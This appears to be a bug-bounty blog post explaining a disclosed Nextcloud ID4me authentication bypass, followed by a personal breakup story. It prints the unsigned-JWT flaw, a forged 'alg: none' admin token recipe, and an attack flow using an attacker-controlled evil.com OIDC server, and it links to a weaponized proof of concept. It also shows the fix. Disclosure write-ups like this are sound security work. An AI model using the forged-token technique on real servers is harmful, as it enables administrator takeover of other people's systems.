June 23, 2026
I Found a 0-Day in Nextcloudโฆ But Couldnโt Find One in a Fake Heart ๐๐
CVE-2026โ45156 | $2,500 Bounty | Critical Auth Bypass
By CyberTechAjju
7 min read
"Main systems mein 0-day dhundh leta hoonโฆ lekin ek insaan ke dil mein chal raha deception nahi detect kar saka."
Author: CyberTechAjju CVE: CVE-2026โ45156 ยท Advisory: GHSA-qqgv-fqwp-mjpp ยท HackerOne: #3489490
๐ง 2 AM. Wednesday. Winter.
Picture this.
Winter. The kind where your fingers freeze on the keyboard but your brain refuses to sleep. It's 2 AM on a Wednesday โ because that's how I roll. Wednesday nights = full night hunt mode. Sleep the entire Thursday like a dead process. Repeat weekly.
Headphones on. Arijit Singh sad mashup playing on loop โ you know the one. "Tum Hi Ho" fading into "Channa Mereya" fading into "Phir Bhi Tumko Chaahunga."
The irony? At this point, I hadn't been through any breakup. I just vibed to Arijit because his voice hits different at 2 AM in a cold night. I thought I understood those songs. I thought the lyrics were just poetry.
Bhai, kuch mahine baad pata chala โ wo poetry nahi thi. Wo prophecy thi. ๐
Every. Single. Lyric. Started making painful, surgical sense. But that heartbreak chapter comes later.
Right now, at 2 AM, wrapped in a rajaii, Arijit crying in my ears, eyes glued to PHP source code โ I'm about to find a Critical 0-day in Nextcloud.
๐ง The Bug โ Explained Like You're 5
What's a JWT?
Think of a JWT like a movie ticket:
โโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโ
โ HEADER โ PAYLOAD โ SIGNATURE โ
โ Theater โ Your seat, name โ Hologram โ
โ info โ show time โ PROOF it's โ
โ โ โ REAL โ
โโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโ
โ HEADER โ PAYLOAD โ SIGNATURE โ
โ Theater โ Your seat, name โ Hologram โ
โ info โ show time โ PROOF it's โ
โ โ โ REAL โ
โโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโThe signature is the hologram โ it proves the ticket wasn't printed on your home printer.
What Nextcloud Did:
They checked the seat numberโฆ but never looked at the hologram. ๐คฆ
// Split the ticket into parts
[$header, $payload, $signature] = explode('.', $token);
// Read the seat number directly
$plainPayload = json_decode(base64_decode($payload), true);
// THE DEVELOPER LITERALLY WROTE THIS:
/** TODO: VALIATE SIGNATURE! */
// ^^ they even misspelled "VALIDATE" lmao
// Used the unverified name to log in the user
$backendUser = $userMapper->getOrCreate(..., $plainPayload['sub']);// Split the ticket into parts
[$header, $payload, $signature] = explode('.', $token);
// Read the seat number directly
$plainPayload = json_decode(base64_decode($payload), true);
// THE DEVELOPER LITERALLY WROTE THIS:
/** TODO: VALIATE SIGNATURE! */
// ^^ they even misspelled "VALIDATE" lmao
// Used the unverified name to log in the user
$backendUser = $userMapper->getOrCreate(..., $plainPayload['sub']);The developer wrote a TODO to verify signatures. Then shipped it. And went home. ๐
๐บ๏ธ Mind Map โ The Whole Vulnerability
๐ The Exploit โ 4 Simple Steps
The Forged Token:
header = {"alg": "none", "typ": "JWT"} # No signature algorithm
payload = {"sub": "admin", "exp": 9999999999} # I'm the admin now
token = base64(header) + "." + base64(payload) + "."
# โ
# Signature = NOTHINGpheader = {"alg": "none", "typ": "JWT"} # No signature algorithm
payload = {"sub": "admin", "exp": 9999999999} # I'm the admin now
token = base64(header) + "." + base64(payload) + "."
# โ
# Signature = NOTHINGpThat's it. A 5-line Python script to become admin on any Nextcloud with ID4me enabled.
The Full Attack:
You (attacker) โ own evil.com
โ set DNS to point to your OIDC server
โ enter "admin@evil.com" on Nextcloud login
โ Nextcloud contacts your server
โ you return forged JWT {"sub": "admin"}
โ Nextcloud does base64_decode(), trusts it
โ you're admin. GG. ๐ฎ You (attacker) โ own evil.com
โ set DNS to point to your OIDC server
โ enter "admin@evil.com" on Nextcloud login
โ Nextcloud contacts your server
โ you return forged JWT {"sub": "admin"}
โ Nextcloud does base64_decode(), trusts it
โ you're admin. GG. ๐ฎ๐ Automated PoC Exploit
I've written a fully weaponized Python script that automates this entire flow (detects Nextcloud, extracts CSRF, starts a fake OIDC server, creates an Ngrok tunnel, and fires the forged token).
You can find the full script on my GitHub: ๐ CVE-2026โ45156 PoC Exploit Repository
(Note: For authorized bug bounty testing only.)
๐ง The Fix (6 Lines vs 4 Broken Ones)
- [$header, $payload, $signature] = explode('.', $data['id_token']);
- $plainPayload = json_decode(base64_decode($payload), true);
- /** TODO: VALIATE SIGNATURE! */
+ use Firebase\JWT\JWT;
+ use Firebase\JWT\JWK;
+ $keys = JWK::parseKeySet(json_decode(file_get_contents($jwksUri), true));
+ $plainPayload = (array) JWT::decode($data['id_token'], $keys);- [$header, $payload, $signature] = explode('.', $data['id_token']);
- $plainPayload = json_decode(base64_decode($payload), true);
- /** TODO: VALIATE SIGNATURE! */
+ use Firebase\JWT\JWT;
+ use Firebase\JWT\JWK;
+ $keys = JWK::parseKeySet(json_decode(file_get_contents($jwksUri), true));
+ $plainPayload = (array) JWT::decode($data['id_token'], $keys);4 lines broke it. 4 lines fixed it.
๐ Stats
๐ The Real Exploit Was on Me
Now the part I didn't plan on writing. But life said "bhai, blog mein masala bhi chahiye."
When I found this bug, my HackerOne account was out of signal. I needed to report fast. So I asked someone I deeply trusted โ my partner, my "collaborator" โ to submit it from her account. I wrote the entire report. Every word, every code snippet, every reproduction step. She clicked Submit. I joined as collaborator.
$2,500 bounty came in. Split between us. All good, right?
Ha ha. No.
The Promises
She made promises. Not just regular promises โ we're talking more promises than a Zero Trust Architecture has verification layers. "I'll never break your trust." "You're the only one." "I'm interested in hacking too!" "We'll grow together."
Bro, a Zero Trust model operates on "never trust, always verify." But her promises? They operated on "always trust me, never verify." And like the idiot I am, I implemented the wrong security model for my heart. ๐คก
The Reality
While I was reversing auth flows at 2 AM in freezing coldโฆ
- She was having spicy conversations with other guys โ the kind that would make even an
alg: noneJWT blush ๐ซฃ - Taking "classes" from people who literally followed me โ tu imagine kar, mere followers se "padhai" ๐
- Her hobbies changed more frequently than a load balancer rotates servers โ one day hacking interested her, next day someone else interested her. Hobby change karna hi uski real hobby thi
- She said she loved hacking. Turns out, the only thing she was hacking was my trust ๐
The Pattern Match
You know what's funny? Before her, I thought "2โ3 relationships didn't work out, maybe I'm the problem." After her, the real vulnerability was patched โ from my brain:
"It wasn't a bug in me. It was a feature in them."
She lied about her interests to get close. Faked her passions. Pretended to care about my world. Classic social engineering โ build rapport, gain trust, extract value, pivot to next target.
I've seen this attack pattern in CTFs. I just never expected it from someone sleeping next to me.
The Arijit Singh Moment
Remember that Arijit Singh sad mashup I was vibing to on that winter night? Back then, "Channa Mereya" was just a nice melody. "Tum Hi Ho" was just background music for coding.
Now? Now every line of those songs hits like a SIGSEGV โ straight crash, no recovery. Arijit wasn't singing songs. He was writing debug logs for my future. ๐ญ๐
Maine socha tha wo gaane bas sunne ke liye hainโฆ Pata nahi tha life mein implement bhi honge. ๐
The Verdict
Her
commitment_tokenhadalg: none. No signature. No integrity. No verification. And I accepted it like Nextcloud accepted my forged JWT โ blindly.
She made more promises than a Zero Trust whitepaperโฆ and broke more than a script kiddie's first exploit.
But here's the thing about forged people โ they get invalidated eventually. Mine did. โ๏ธ
๐ค Why Real Hackers Stay Single
I'm going to say something controversial:
The best hackers I know are single. Not because they can't find someone โ but because they learned that
human.trust()has the worst vulnerability disclosure program.
Think about it:
| Hacking | Relationships |
|----------------------------------|-------------------------------------|
| Find bug โ report โ get bounty | Find red flag โ ignore โ get burned |
| Zero Trust Architecture | Zero Trust... but still trusted |
| Exploits get patched | Toxic people don't |
| CVE stays forever in NVD | "I love you" gets deleted |
| Source code doesn't lie | People absolutely do || Hacking | Relationships |
|----------------------------------|-------------------------------------|
| Find bug โ report โ get bounty | Find red flag โ ignore โ get burned |
| Zero Trust Architecture | Zero Trust... but still trusted |
| Exploits get patched | Toxic people don't |
| CVE stays forever in NVD | "I love you" gets deleted |
| Source code doesn't lie | People absolutely do |_Main ye nahi keh raha ki pyar mat karo. Main ye keh raha hoon โ _pehle khud ko itna valuable banao ki tumhe dhokha dene waale ko regret ho.
And that's exactly what happened. She has screenshots and drama. I have a CVE in the National Vulnerability Database. ๐
๐ Lessons (Hacking + Life)
For Your Terminal:
- Read TODO comments โ Developers confess their sins in them
base64_decode()โ security โ If JWTs are decoded manually, that's your 0-day- Test optional features โ ID4me was a forgotten corner. Best bugs hide in forgotten corners
- Source code review > scanners โ No tool found this. My eyes at 2 AM with Arijit in my ears did
explode('.', $jwt)= red flag โ If you see this, start writing your report
For Your Heart:
- Your account. Your report. Always. โ Never submit your work from someone else's profile. EVER.
- Implement Zero Trust in life too โ Not just in your architecture. Verify people's actions, not their words
- If someone changes hobbies faster than you change branches โ that's not a personality, that's social engineering ๐ฉ
- Promises without proof =
alg: noneโ Anyone can say anything. Signature kahan hai? - Real hackers don't need validation from people โ Your CVE validates you. NVD validates you. Your skills validate you. Not someone's "I love you" at midnight
- Breakups heal. CVEs are permanent. โ She'll forget you. But CVE-2026-45156 will be in NVD till the internet dies
- Stay single until someone matches your energy โ Not your followers. Not your bounties. YOUR ENERGY.
๐ Links
- CVE: CVE-2026โ45156
- HackerOne: Report #3489490
- Advisory: GHSA-qqgv-fqwp-mjpp
- PoC Exploit Code: GitHub Repository (For Authorized Testing Only)
๐ฌ Quotes I Live By Now
"Forged tokens get invalidated eventually. And so do fake people."
"She promised more than a Zero Trust whitepaperโฆ and delivered less than a TODO comment."
"I couldn't find the 0-day in her heart because she was running a completely different OS than what she advertised."
"Arijit Singh isn't a singer. He's a vulnerability scanner for the heart. And my scan results came back CRITICAL."
"Real hackers don't cry over breakups. They open their laptop and find the next CVE. The NVD remembers you longer than any person ever will."
๐จโ๐ป About Me
CyberTechAjju โ Bug Bounty Hunter ยท Security Researcher ยท ๐ GitHub ยท ๐ CVE-2026โ45156 ยท ๐Linkedin
Finding 0-days in systems since winter nights. Learning to find them in people since heartbreak. Currently single. Not because I can't find someone โ but because my vulnerability scanner for humans is still in beta. ๐ If this helped you learn something โ about hacking or about life โ share it with a fellow hacker. And remember: always verify signatures. In JWT tokensโฆ and in people who say "I love you." ๐๐